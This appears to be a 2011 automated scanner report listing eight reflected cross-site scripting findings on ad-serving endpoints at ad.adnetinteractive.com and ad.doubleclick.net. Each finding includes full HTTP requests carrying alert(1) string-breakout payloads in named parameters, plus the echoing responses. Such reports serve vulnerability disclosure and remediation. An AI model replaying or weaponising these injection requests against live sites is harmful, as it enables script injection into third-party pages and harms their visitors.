In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://ad.adnetinteractive.com/st [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.adnetinteractive.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cd0e3"-alert(1)-"c4c905c666e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?ad_type=iframe&ad_size=300x250&section=1415802\&cd0e3"-alert(1)-"c4c905c666e=1 HTTP/1.1
Host: ad.adnetinteractive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:03:48 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Thu, 03 Feb 2011 19:03:48 GMT
Pragma: no-cache
Content-Length: 4669
Age: 0
Connection: close

<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "iframe"; rm_url = "http://ad.adnetinteractive.com/imp?Z=300x250&cd0e3"-alert(1)-"c4c905c666e=1&s=1415802%5c&_salt=4264763177";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_data=new Array();}if(rm_passback==0){rm_pb_data=new Array();
...[SNIP]...

1.2. http://ad.doubleclick.net/adi/N3285.google/B2343920.135 [adurl parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3285.google/B2343920.135

Issue detail

The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a5cd8"-alert(1)-"b9616ec1409 was submitted in the adurl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3285.google/B2343920.135;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BHySKRuhKTb6zIoL1lAeJ9IjIDpPAhvIBu8vR0xmzgZKkVqCNBhABGAEgjY_6BTgAUKLzptb-_____wFgyb6yiZCk0BGgAf2k--gDsgETd3d3LmFjY3V3ZWF0aGVyLmNvbboBETA3Mjh4OTBfcGFzX2FiZ25jyAEJ2gE8aHR0cDovL3d3dy5hY2N1d2VhdGhlci5jb20vdXMvc2F0ZWxsaXRlL2VpL3VzXy9zYXRlbGxpdGUuYXNw-AEBuAIYwAIByAKLm-ERqAMB0QMIYrQRpruKOegDP-gDvAjoA4kp9QMABAAE&num=1&sig=AGiWqtxWQnkqarhWmPaKOE590oYbCpM76Q&client=ca-accuweather-site_728x90&adurl=a5cd8"-alert(1)-"b9616ec1409 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-accuweather-site_728x90&format=728x90_pas_abgnc&output=html&h=90&w=728&channel=ATF&ad_type=text_image&ea=0&color_bg=EEEEEE&color_border=0000FF&color_line=FFFFFF&color_url=0099FF&flash=10.1.103&url=http%3A%2F%2Fwww.accuweather.com%2Fus%2Fsatellite%2Fei%2Fus_%2Fsatellite.asp&adsafe=high&dt=1296754778543&shv=r20101117&jsv=r20110120&saldr=1&correlator=1296754778565&frm=1&adk=377006110&ga_vid=973396829.1296754779&ga_sid=1296754779&ga_hid=783797542&ga_fc=0&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3179948421&eid=30143102&loc=http%3A%2F%2Fwww.accuweather.com%2Fus%2Fsatellite%2Fei%2Fus_%2Fsatellite.asp&fu=0&ifi=1&dtd=706
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4862
Cache-Control: no-cache
Pragma: no-cache
Date: Thu, 03 Feb 2011 18:54:01 GMT
Expires: Thu, 03 Feb 2011 18:54:01 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 2593 Template Name = Banner Creative (Flash) - In Page --
...[SNIP]...
Ghlci5jb20vdXMvc2F0ZWxsaXRlL2VpL3VzXy9zYXRlbGxpdGUuYXNw-AEBuAIYwAIByAKLm-ERqAMB0QMIYrQRpruKOegDP-gDvAjoA4kp9QMABAAE&num=1&sig=AGiWqtxWQnkqarhWmPaKOE590oYbCpM76Q&client=ca-accuweather-site_728x90&adurl=a5cd8"-alert(1)-"b9616ec1409https://insurance.lowermybills.com/auto/?sourceid=57808600-233911573-40497630");
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";
var openWindow = "false";
var winW = 728;
var winH
...[SNIP]...

1.3. http://ad.doubleclick.net/adi/N3285.google/B2343920.135 [ai parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3285.google/B2343920.135

Issue detail

The value of the ai request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fe3a4"-alert(1)-"4f02e128fb4 was submitted in the ai parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3285.google/B2343920.135;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BHySKRuhKTb6zIoL1lAeJ9IjIDpPAhvIBu8vR0xmzgZKkVqCNBhABGAEgjY_6BTgAUKLzptb-_____wFgyb6yiZCk0BGgAf2k--gDsgETd3d3LmFjY3V3ZWF0aGVyLmNvbboBETA3Mjh4OTBfcGFzX2FiZ25jyAEJ2gE8aHR0cDovL3d3dy5hY2N1d2VhdGhlci5jb20vdXMvc2F0ZWxsaXRlL2VpL3VzXy9zYXRlbGxpdGUuYXNw-AEBuAIYwAIByAKLm-ERqAMB0QMIYrQRpruKOegDP-gDvAjoA4kp9QMABAAEfe3a4"-alert(1)-"4f02e128fb4&num=1&sig=AGiWqtxWQnkqarhWmPaKOE590oYbCpM76Q&client=ca-accuweather-site_728x90&adurl=;ord=258545048? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-accuweather-site_728x90&format=728x90_pas_abgnc&output=html&h=90&w=728&channel=ATF&ad_type=text_image&ea=0&color_bg=EEEEEE&color_border=0000FF&color_line=FFFFFF&color_url=0099FF&flash=10.1.103&url=http%3A%2F%2Fwww.accuweather.com%2Fus%2Fsatellite%2Fei%2Fus_%2Fsatellite.asp&adsafe=high&dt=1296754778543&shv=r20101117&jsv=r20110120&saldr=1&correlator=1296754778565&frm=1&adk=377006110&ga_vid=973396829.1296754779&ga_sid=1296754779&ga_hid=783797542&ga_fc=0&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3179948421&eid=30143102&loc=http%3A%2F%2Fwww.accuweather.com%2Fus%2Fsatellite%2Fei%2Fus_%2Fsatellite.asp&fu=0&ifi=1&dtd=706
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Thu, 03 Feb 2011 18:53:05 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4873

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 2593 Template Name = Banner Creative (Flash) - In Page --
...[SNIP]...
Td3d3LmFjY3V3ZWF0aGVyLmNvbboBETA3Mjh4OTBfcGFzX2FiZ25jyAEJ2gE8aHR0cDovL3d3dy5hY2N1d2VhdGhlci5jb20vdXMvc2F0ZWxsaXRlL2VpL3VzXy9zYXRlbGxpdGUuYXNw-AEBuAIYwAIByAKLm-ERqAMB0QMIYrQRpruKOegDP-gDvAjoA4kp9QMABAAEfe3a4"-alert(1)-"4f02e128fb4&num=1&sig=AGiWqtxWQnkqarhWmPaKOE590oYbCpM76Q&client=ca-accuweather-site_728x90&adurl=https%3a%2f%2finsurance.lowermybills.com/auto/%3Fsourceid%3D57808600-233911573-40324242");
var wmode = "opaque";
va
...[SNIP]...

1.4. http://ad.doubleclick.net/adi/N3285.google/B2343920.135 [client parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3285.google/B2343920.135

Issue detail

The value of the client request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5975c"-alert(1)-"1d646e7eef8 was submitted in the client parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3285.google/B2343920.135;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BHySKRuhKTb6zIoL1lAeJ9IjIDpPAhvIBu8vR0xmzgZKkVqCNBhABGAEgjY_6BTgAUKLzptb-_____wFgyb6yiZCk0BGgAf2k--gDsgETd3d3LmFjY3V3ZWF0aGVyLmNvbboBETA3Mjh4OTBfcGFzX2FiZ25jyAEJ2gE8aHR0cDovL3d3dy5hY2N1d2VhdGhlci5jb20vdXMvc2F0ZWxsaXRlL2VpL3VzXy9zYXRlbGxpdGUuYXNw-AEBuAIYwAIByAKLm-ERqAMB0QMIYrQRpruKOegDP-gDvAjoA4kp9QMABAAE&num=1&sig=AGiWqtxWQnkqarhWmPaKOE590oYbCpM76Q&client=ca-accuweather-site_728x905975c"-alert(1)-"1d646e7eef8&adurl=;ord=258545048? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-accuweather-site_728x90&format=728x90_pas_abgnc&output=html&h=90&w=728&channel=ATF&ad_type=text_image&ea=0&color_bg=EEEEEE&color_border=0000FF&color_line=FFFFFF&color_url=0099FF&flash=10.1.103&url=http%3A%2F%2Fwww.accuweather.com%2Fus%2Fsatellite%2Fei%2Fus_%2Fsatellite.asp&adsafe=high&dt=1296754778543&shv=r20101117&jsv=r20110120&saldr=1&correlator=1296754778565&frm=1&adk=377006110&ga_vid=973396829.1296754779&ga_sid=1296754779&ga_hid=783797542&ga_fc=0&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3179948421&eid=30143102&loc=http%3A%2F%2Fwww.accuweather.com%2Fus%2Fsatellite%2Fei%2Fus_%2Fsatellite.asp&fu=0&ifi=1&dtd=706
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Thu, 03 Feb 2011 18:53:56 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4873

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 2593 Template Name = Banner Creative (Flash) - In Page --
...[SNIP]...
N1d2VhdGhlci5jb20vdXMvc2F0ZWxsaXRlL2VpL3VzXy9zYXRlbGxpdGUuYXNw-AEBuAIYwAIByAKLm-ERqAMB0QMIYrQRpruKOegDP-gDvAjoA4kp9QMABAAE&num=1&sig=AGiWqtxWQnkqarhWmPaKOE590oYbCpM76Q&client=ca-accuweather-site_728x905975c"-alert(1)-"1d646e7eef8&adurl=https%3a%2f%2finsurance.lowermybills.com/auto/%3Fsourceid%3D57808600-233911573-40324242");
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";
var openWindow = "false";
var win
...[SNIP]...

1.5. http://ad.doubleclick.net/adi/N3285.google/B2343920.135 [num parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3285.google/B2343920.135

Issue detail

The value of the num request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7bbf3"-alert(1)-"7f571aed142 was submitted in the num parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3285.google/B2343920.135;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BHySKRuhKTb6zIoL1lAeJ9IjIDpPAhvIBu8vR0xmzgZKkVqCNBhABGAEgjY_6BTgAUKLzptb-_____wFgyb6yiZCk0BGgAf2k--gDsgETd3d3LmFjY3V3ZWF0aGVyLmNvbboBETA3Mjh4OTBfcGFzX2FiZ25jyAEJ2gE8aHR0cDovL3d3dy5hY2N1d2VhdGhlci5jb20vdXMvc2F0ZWxsaXRlL2VpL3VzXy9zYXRlbGxpdGUuYXNw-AEBuAIYwAIByAKLm-ERqAMB0QMIYrQRpruKOegDP-gDvAjoA4kp9QMABAAE&num=17bbf3"-alert(1)-"7f571aed142&sig=AGiWqtxWQnkqarhWmPaKOE590oYbCpM76Q&client=ca-accuweather-site_728x90&adurl=;ord=258545048? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-accuweather-site_728x90&format=728x90_pas_abgnc&output=html&h=90&w=728&channel=ATF&ad_type=text_image&ea=0&color_bg=EEEEEE&color_border=0000FF&color_line=FFFFFF&color_url=0099FF&flash=10.1.103&url=http%3A%2F%2Fwww.accuweather.com%2Fus%2Fsatellite%2Fei%2Fus_%2Fsatellite.asp&adsafe=high&dt=1296754778543&shv=r20101117&jsv=r20110120&saldr=1&correlator=1296754778565&frm=1&adk=377006110&ga_vid=973396829.1296754779&ga_sid=1296754779&ga_hid=783797542&ga_fc=0&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3179948421&eid=30143102&loc=http%3A%2F%2Fwww.accuweather.com%2Fus%2Fsatellite%2Fei%2Fus_%2Fsatellite.asp&fu=0&ifi=1&dtd=706
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Thu, 03 Feb 2011 18:53:24 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4873

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 2593 Template Name = Banner Creative (Flash) - In Page --
...[SNIP]...
mFjY3V3ZWF0aGVyLmNvbboBETA3Mjh4OTBfcGFzX2FiZ25jyAEJ2gE8aHR0cDovL3d3dy5hY2N1d2VhdGhlci5jb20vdXMvc2F0ZWxsaXRlL2VpL3VzXy9zYXRlbGxpdGUuYXNw-AEBuAIYwAIByAKLm-ERqAMB0QMIYrQRpruKOegDP-gDvAjoA4kp9QMABAAE&num=17bbf3"-alert(1)-"7f571aed142&sig=AGiWqtxWQnkqarhWmPaKOE590oYbCpM76Q&client=ca-accuweather-site_728x90&adurl=https%3a%2f%2finsurance.lowermybills.com/auto/%3Fsourceid%3D57808600-233911573-40324242");
var wmode = "opaque";
var bg =
...[SNIP]...

1.6. http://ad.doubleclick.net/adi/N3285.google/B2343920.135 [sig parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3285.google/B2343920.135

Issue detail

The value of the sig request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7284c"-alert(1)-"82b821f28bc was submitted in the sig parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3285.google/B2343920.135;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BHySKRuhKTb6zIoL1lAeJ9IjIDpPAhvIBu8vR0xmzgZKkVqCNBhABGAEgjY_6BTgAUKLzptb-_____wFgyb6yiZCk0BGgAf2k--gDsgETd3d3LmFjY3V3ZWF0aGVyLmNvbboBETA3Mjh4OTBfcGFzX2FiZ25jyAEJ2gE8aHR0cDovL3d3dy5hY2N1d2VhdGhlci5jb20vdXMvc2F0ZWxsaXRlL2VpL3VzXy9zYXRlbGxpdGUuYXNw-AEBuAIYwAIByAKLm-ERqAMB0QMIYrQRpruKOegDP-gDvAjoA4kp9QMABAAE&num=1&sig=AGiWqtxWQnkqarhWmPaKOE590oYbCpM76Q7284c"-alert(1)-"82b821f28bc&client=ca-accuweather-site_728x90&adurl=;ord=258545048? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-accuweather-site_728x90&format=728x90_pas_abgnc&output=html&h=90&w=728&channel=ATF&ad_type=text_image&ea=0&color_bg=EEEEEE&color_border=0000FF&color_line=FFFFFF&color_url=0099FF&flash=10.1.103&url=http%3A%2F%2Fwww.accuweather.com%2Fus%2Fsatellite%2Fei%2Fus_%2Fsatellite.asp&adsafe=high&dt=1296754778543&shv=r20101117&jsv=r20110120&saldr=1&correlator=1296754778565&frm=1&adk=377006110&ga_vid=973396829.1296754779&ga_sid=1296754779&ga_hid=783797542&ga_fc=0&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3179948421&eid=30143102&loc=http%3A%2F%2Fwww.accuweather.com%2Fus%2Fsatellite%2Fei%2Fus_%2Fsatellite.asp&fu=0&ifi=1&dtd=706
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Thu, 03 Feb 2011 18:53:42 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4870

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 2593 Template Name = Banner Creative (Flash) - In Page --
...[SNIP]...
X2FiZ25jyAEJ2gE8aHR0cDovL3d3dy5hY2N1d2VhdGhlci5jb20vdXMvc2F0ZWxsaXRlL2VpL3VzXy9zYXRlbGxpdGUuYXNw-AEBuAIYwAIByAKLm-ERqAMB0QMIYrQRpruKOegDP-gDvAjoA4kp9QMABAAE&num=1&sig=AGiWqtxWQnkqarhWmPaKOE590oYbCpM76Q7284c"-alert(1)-"82b821f28bc&client=ca-accuweather-site_728x90&adurl=https%3a%2f%2finsurance.lowermybills.com/auto/%3Fsourceid%3D57808600-233911573-40567083");
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";
...[SNIP]...

1.7. http://ad.doubleclick.net/adi/N3285.google/B2343920.135 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3285.google/B2343920.135

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ae9b3"-alert(1)-"8421c6bfdc2 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3285.google/B2343920.135;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=lae9b3"-alert(1)-"8421c6bfdc2&ai=BHySKRuhKTb6zIoL1lAeJ9IjIDpPAhvIBu8vR0xmzgZKkVqCNBhABGAEgjY_6BTgAUKLzptb-_____wFgyb6yiZCk0BGgAf2k--gDsgETd3d3LmFjY3V3ZWF0aGVyLmNvbboBETA3Mjh4OTBfcGFzX2FiZ25jyAEJ2gE8aHR0cDovL3d3dy5hY2N1d2VhdGhlci5jb20vdXMvc2F0ZWxsaXRlL2VpL3VzXy9zYXRlbGxpdGUuYXNw-AEBuAIYwAIByAKLm-ERqAMB0QMIYrQRpruKOegDP-gDvAjoA4kp9QMABAAE&num=1&sig=AGiWqtxWQnkqarhWmPaKOE590oYbCpM76Q&client=ca-accuweather-site_728x90&adurl=;ord=258545048? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-accuweather-site_728x90&format=728x90_pas_abgnc&output=html&h=90&w=728&channel=ATF&ad_type=text_image&ea=0&color_bg=EEEEEE&color_border=0000FF&color_line=FFFFFF&color_url=0099FF&flash=10.1.103&url=http%3A%2F%2Fwww.accuweather.com%2Fus%2Fsatellite%2Fei%2Fus_%2Fsatellite.asp&adsafe=high&dt=1296754778543&shv=r20101117&jsv=r20110120&saldr=1&correlator=1296754778565&frm=1&adk=377006110&ga_vid=973396829.1296754779&ga_sid=1296754779&ga_hid=783797542&ga_fc=0&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3179948421&eid=30143102&loc=http%3A%2F%2Fwww.accuweather.com%2Fus%2Fsatellite%2Fei%2Fus_%2Fsatellite.asp&fu=0&ifi=1&dtd=706
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Thu, 03 Feb 2011 18:52:44 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4873

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 2593 Template Name = Banner Creative (Flash) - In Page --
...[SNIP]...
l = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3aa3/f/1d3/%2a/c%3B233911573%3B0-0%3B0%3B57808600%3B3454-728/90%3B40306455/40324242/1%3B%3B%7Esscs%3D%3fhttp://googleads.g.doubleclick.net/aclk?sa=lae9b3"-alert(1)-"8421c6bfdc2&ai=BHySKRuhKTb6zIoL1lAeJ9IjIDpPAhvIBu8vR0xmzgZKkVqCNBhABGAEgjY_6BTgAUKLzptb-_____wFgyb6yiZCk0BGgAf2k--gDsgETd3d3LmFjY3V3ZWF0aGVyLmNvbboBETA3Mjh4OTBfcGFzX2FiZ25jyAEJ2gE8aHR0cDovL3d3dy5hY2N1d2VhdGhlci5j
...[SNIP]...

1.8. http://ad.doubleclick.net/adi/N6036.GoogleFinance/B5133220.11 [adurl parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6036.GoogleFinance/B5133220.11

Issue detail

The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3ab7c"-alert(1)-"ad8c3af37fd was submitted in the adurl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N6036.GoogleFinance/B5133220.11;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=L&ai=BFO39S9FKTaiCFKjtlQe2q80qmM3F_gGomaveHcCNtwEAEAEYASCq9oUYOABQ5eTNw_3_____AWDJvrKJkKTQEbIBDXd3dy5sb2NhbC5jb226AQk3Mjh4OTBfYXPIAQnaAXRodHRwOi8vd3d3LmxvY2FsLmNvbS9kYXJ0Lz9hZz1UcnVlJmNzcz1iYW5uZXImcD1sb2NtLnBwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4Njk4NjQmaz1iYW5rcyZsPURhbGxhcyUyQytUWJgCgB64AhjIAvDfoxqoAwH1AwAAAMQ&num=1&sig=AGiWqtz4qZqfIzfv-DSvPyT6FbU7TuUAMQ&client=ca-pub-4103679352234073&adurl=3ab7c"-alert(1)-"ad8c3af37fd HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7495
Cache-Control: no-cache
Pragma: no-cache
Date: Thu, 03 Feb 2011 16:05:07 GMT
Expires: Thu, 03 Feb 2011 16:05:07 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
